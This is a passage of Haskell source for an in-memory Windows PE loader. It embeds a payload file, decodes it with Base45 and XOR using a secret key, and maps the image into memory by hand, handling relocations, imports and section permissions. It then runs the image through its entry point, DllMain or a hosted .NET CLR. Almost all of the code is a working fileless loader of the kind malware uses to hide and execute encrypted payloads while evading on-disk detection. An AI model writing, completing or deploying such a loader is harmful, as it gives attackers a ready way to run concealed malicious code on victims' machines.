executeTlsCallbacks :: Ptr Word8 -> Ptr Word64 -> IO ()
executeTlsCallbacks imageBase callbackPtr = do
  callbackAddr <- peek callbackPtr

  when (callbackAddr /= 0) $ do
    let addr64 = fromIntegral callbackAddr :: Integer
    putStrLn $ "Found TLS callback at address: 0x" ++ showHex addr64 ""
    executeTlsCallbacks imageBase (plusPtr callbackPtr 8)

finalizeSections :: Ptr Word8 -> Ptr ImageNtHeaders64 -> IO ()
finalizeSections imageBase ntPtr = do
  ntHeaders <- peek ntPtr
  let fileHeader = nt_fileHeader ntHeaders
      optHeader = nt_optionalHeader ntHeaders
      numSections = fromIntegral $ fh_numberOfSections fileHeader
      sectionHeaderPtr = plusPtr ntPtr (4 + 20 + fromIntegral (fh_sizeOfOptionalHeader fileHeader))

  forM_ [0..numSections-1] $ \i -> do
    section <- peekElemOff sectionHeaderPtr i
    setSectionPermissions imageBase section

  process <- c_GetCurrentProcess
  let flushSizeC = fromIntegral (oh_sizeOfImage optHeader) :: CSize
  _ <- c_FlushInstructionCache process (castPtr imageBase :: Ptr ()) flushSizeC
  return ()

-- ============================================
-- MAIN PE LOADER
-- ============================================

loadPEFromMemory :: BS.ByteString -> IO ()
loadPEFromMemory peData = BSU.unsafeUseAsCStringLen peData $ \(dataPtr, dataLen) -> do
  putStrLn $ "[*] PE data length: " ++ show dataLen
  hFlush stdout

  when (dataLen < 64) $
    error "PE data too small"

  dosHeader <- peek (castPtr dataPtr :: Ptr ImageDosHeader)
  putStrLn $ "[*] DOS magic: 0x" ++ showHex (dos_e_magic dosHeader :: Word16) ""
  putStrLn $ "[*] e_lfanew: " ++ show (dos_e_lfanew dosHeader)
  hFlush stdout

  when (dos_e_magic dosHeader /= 0x5A4D) $
    error "Invalid MZ signature"

  let ntOffset = fromIntegral $ dos_e_lfanew dosHeader
  when (ntOffset + 264 > dataLen) $
    error "Invalid NT header offset"

  let ntPtr = plusPtr dataPtr ntOffset :: Ptr ImageNtHeaders64
  ntHeaders <- peek ntPtr

  putStrLn $ "[*] NT signature: 0x" ++ showHex (nt_signature ntHeaders) ""
  hFlush stdout
  when (nt_signature ntHeaders /= 0x4550) $
    error "Invalid PE signature"

  let optHeader = nt_optionalHeader ntHeaders
  putStrLn $ "[*] Optional header magic: 0x" ++ showHex (oh_magic optHeader) ""
  hFlush stdout
  when (oh_magic optHeader /= 0x20b) $
    error "Only 64-bit PE files supported"

  putStrLn $ "[*] SizeOfImage: " ++ show (oh_sizeOfImage optHeader)
  putStrLn $ "[*] SizeOfHeaders: " ++ show (oh_sizeOfHeaders optHeader)
  hFlush stdout

  let imageSize = fromIntegral $ oh_sizeOfImage optHeader
  when (imageSize == 0) $
    error "Invalid image size"

  putStrLn $ "[*] Computed image size: " ++ show imageSize ++ " bytes"
  hFlush stdout

  when (imageSize > maxImageSizeBytes) $ do
    putStrLn $ "[!] Refusing to allocate image: size " ++ show imageSize ++ " exceeds limit of " ++ show maxImageSizeBytes ++ " bytes"
    hFlush stdout
    error "Image size exceeds safety limit"

  let imageSizeC = fromIntegral imageSize :: CSize
  imageBase <- c_VirtualAlloc nullPtr imageSizeC (mEM_COMMIT .|. mEM_RESERVE) pAGE_READWRITE
  when (imageBase == nullPtr) $ do
    err <- c_GetLastError
    error $ "VirtualAlloc failed (error: " ++ show err ++ ")"

  putStrLn $ "[*] Allocated image base: 0x" ++ showHex (ptrToWordPtr imageBase) ""
  hFlush stdout

  let imageBasePtr = castPtr imageBase :: Ptr Word8

  let headersSize = fromIntegral $ oh_sizeOfHeaders optHeader
  copyBytes imageBasePtr (castPtr dataPtr) headersSize
  hFlush stdout

  let fileHeader = nt_fileHeader ntHeaders
      numSections = fromIntegral $ fh_numberOfSections fileHeader
      sectionHeaderPtr = plusPtr ntPtr (4 + 20 + fromIntegral (fh_sizeOfOptionalHeader fileHeader))

  putStrLn $ "[*] Number of sections: " ++ show numSections
  hFlush stdout

  forM_ [0..numSections-1] $ \i -> do
    section <- peekElemOff sectionHeaderPtr i
    when (sec_sizeOfRawData section > 0) $ do
      let dest = plusPtr imageBasePtr (fromIntegral $ sec_virtualAddress section)
          src = plusPtr dataPtr (fromIntegral $ sec_pointerToRawData section)
          size = fromIntegral $ sec_sizeOfRawData section
      putStrLn $ "[*] Copying section " ++ show i ++ " size " ++ show size
      hFlush stdout
      copyBytes dest src size

  let ntHeadersInMem = castPtr imageBasePtr `plusPtr` ntOffset :: Ptr ImageNtHeaders64

  processRelocations imageBasePtr ntHeadersInMem
  resolveImports imageBasePtr ntHeadersInMem
  finalizeSections imageBasePtr ntHeadersInMem
  processTlsCallbacks imageBasePtr ntHeadersInMem

  comDir <- getDataDirectory ntHeadersInMem iMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
  comDirData <- peek comDir
 
  if dd_virtualAddress comDirData /= 0 && dd_size comDirData /= 0
    then do
      putStrLn "[*] Detected .NET assembly. Attempting to load CLR via hosting APIs."
      hFlush stdout

      hr <- c_CoInitializeEx nullPtr 0 
      when (hr < 0 && hr /= -2147417850) $ do
        err <- c_GetLastError
        putStrLn $ "[!] CoInitializeEx warning: " ++ show hr ++ " (last error: " ++ show err ++ ")"
      
      putStrLn "[*] COM initialized."
      hFlush stdout

      pRuntimeHostRaw <- getCLRRuntimeHost
      let runtimeHostRaw = castPtr pRuntimeHostRaw
      
      putStrLn "[*] ICLRRuntimeHost instance created."
      hFlush stdout

      -- [FIXED]: Dereference to get the actual VTable address for x64
      vtablePtr <- peek (castPtr runtimeHostRaw) :: IO (Ptr (Ptr ()))
      
      pStartFuncPtr <- pStart (castPtr vtablePtr)
      if pStartFuncPtr == nullFunPtr
        then error "[-] Critical Error: pStartFuncPtr is NULL. VTable offset is wrong for x64."
        else putStrLn $ "[*] Start function pointer located."

      hrStart <- mkCLRStart pStartFuncPtr runtimeHostRaw
      if hrStart < 0 
        then do
          err <- c_GetLastError
          error $ "ICLRRuntimeHost::Start failed: " ++ show hrStart
        else putStrLn "[*] CLR started successfully."

      alloca $ \ppvDomain -> do
        pGetDefaultDomainFuncPtr <- pGetDefaultDomain (castPtr vtablePtr)
        hrGetDomain <- mkCLRGetDefaultDomain pGetDefaultDomainFuncPtr runtimeHostRaw ppvDomain
        
        when (hrGetDomain < 0) $ error "Failed to get AppDomain"
        
        pAppDomainIUnknown <- peek ppvDomain
        let appDomainRaw = castPtr pAppDomainIUnknown
        
        -- [FIXED]: Dereference AppDomain VTable
        domainVtablePtr <- peek (castPtr appDomainRaw) :: IO (Ptr (Ptr ()))

        appBasePath <- newCWString "C:\\"
        bstrAppBase <- c_SysAllocString (castPtr appBasePath)
        free appBasePath

        pPutApplicationBaseFuncPtr <- pPutApplicationBase (castPtr domainVtablePtr)
        _ <- mkADPutApplicationBase pPutApplicationBaseFuncPtr (castPtr appDomainRaw) bstrAppBase
        c_SysFreeString bstrAppBase
        
        putStrLn "[*] AppDomain ApplicationBase set. Calling _CorExeMain..."
        hFlush stdout
        
        rc <- c_CorExeMain imageBase
        putStrLn $ "[*] _CorExeMain returned: " ++ show rc

        pRelease_ADFuncPtr <- pRelease_AD (castPtr domainVtablePtr)
        _ <- mkADRelease pRelease_ADFuncPtr (castPtr appDomainRaw)
        putStrLn "[*] AppDomain released."

      pStopFuncPtr <- pStop (castPtr vtablePtr)
      _ <- mkCLRStop pStopFuncPtr runtimeHostRaw
      
      pReleaseFuncPtr <- pRelease (castPtr vtablePtr)
      _ <- mkCLRRelease pReleaseFuncPtr runtimeHostRaw

      c_CoUninitialize
      putStrLn "[*] COM uninitialized."
      return ()
      else do
      optHeaderInMem <- nt_optionalHeader <$> peek ntHeadersInMem
      let entryPointRVA = oh_addressOfEntryPoint optHeaderInMem
          entryPointPtr = plusPtr imageBasePtr (fromIntegral entryPointRVA)
          subsystem = oh_subsystem optHeaderInMem

      when (entryPointRVA == 0) $
        error "Invalid entry point"

      let entryAddrWord = ptrToWordPtr entryPointPtr
          entryAddrInteger = fromIntegral entryAddrWord :: Integer

      putStrLn $ "[*] Entry point RVA: 0x" ++ showHex (fromIntegral entryPointRVA :: Integer) ""
      putStrLn $ "[*] Entry point virtual address: 0x" ++ showHex entryAddrInteger ""
      putStrLn $ "[*] Subsystem: " ++ show subsystem
      hFlush stdout

      putStrLn "[*] Execution gate passed. Executing entry point (in-memory)."
      hFlush stdout

      if subsystem == 2 || subsystem == 3
        then do
          let entryFunPtr = castPtrToFunPtr entryPointPtr :: FunPtr (IO Int32)
          putStrLn "[*] Calling mkEntryPoint..."
          hFlush stdout
          rc <- mkEntryPoint entryFunPtr
          putStrLn $ "[*] Entry point returned: " ++ show rc
          hFlush stdout
          return ()
        else do
          let dllMainFunPtr = castPtrToFunPtr entryPointPtr :: FunPtr (Ptr () -> Word32 -> Ptr () -> IO Int32)
          putStrLn "[*] Calling mkDllMain..."
          hFlush stdout
          rc <- mkDllMain dllMainFunPtr imageBase dLL_PROCESS_ATTACH nullPtr
          putStrLn $ "[*] DllMain returned: " ++ show rc
          hFlush stdout
          return ()

-- ============================================
-- MAIN
-- ============================================

main :: IO ()
main = do
  hSetBuffering stdout LineBuffering
  hSetBuffering stderr LineBuffering

  putStrLn "[*] Starting PE loader with Base45 + XOR decoding"
  let encodedPayload = $(embedFile "payload.bin")
  
  putStrLn $ "[*] Embedded payload size: " ++ show (BS.length encodedPayload) ++ " bytes"
  putStrLn $ "[*] Secret key length: " ++ show (BS.length secretKey)
  hFlush stdout

  -- Step 1: Base45 decode
  putStrLn "[*] Decoding Base45..."
  hFlush stdout
  
  base45Decoded <- case decodeBS encodedPayload of
    Left err -> do
      putStrLn $ "[!] Base45 decode failed: " ++ err
      hFlush stdout
      exitFailure
    Right decoded -> do
      putStrLn $ "[*] Base45 decoded successfully."
      hFlush stdout
      return decoded

  -- Step 2: XOR decode
  putStrLn "[*] Decoding XOR..."
  hFlush stdout
  let peBytes = xorDecode secretKey base45Decoded
  putStrLn $ "[*] XOR decoded: " ++ show (BS.length peBytes) ++ " bytes"
  hFlush stdout

  -- Step 3: Load the PE
  putStrLn "[*] Attempting to load PE from memory..."
  hFlush stdout

  -- [FIXED]: Added explicit timeout call and separated the case statement clearly
  maybeResult <- timeout loaderTimeoutMicros (try (loadPEFromMemory peBytes) :: IO (Either SomeException ()))
  
  -- The case statement must be aligned at the same level as maybeResult
  case maybeResult of
    Nothing -> do
      putStrLn $ "[!] PE loader timed out after " ++ show (loaderTimeoutMicros `div` 1000000) ++ " seconds."
      hFlush stdout
      exitFailure
    Just result -> case result of
      Left ex -> do
        putStrLn $ "[!] Exception during PE loading: " ++ show ex
        hFlush stdout
        exitFailure
      Right _ -> do
        putStrLn "[*] PE loader finished."
        hFlush stdout
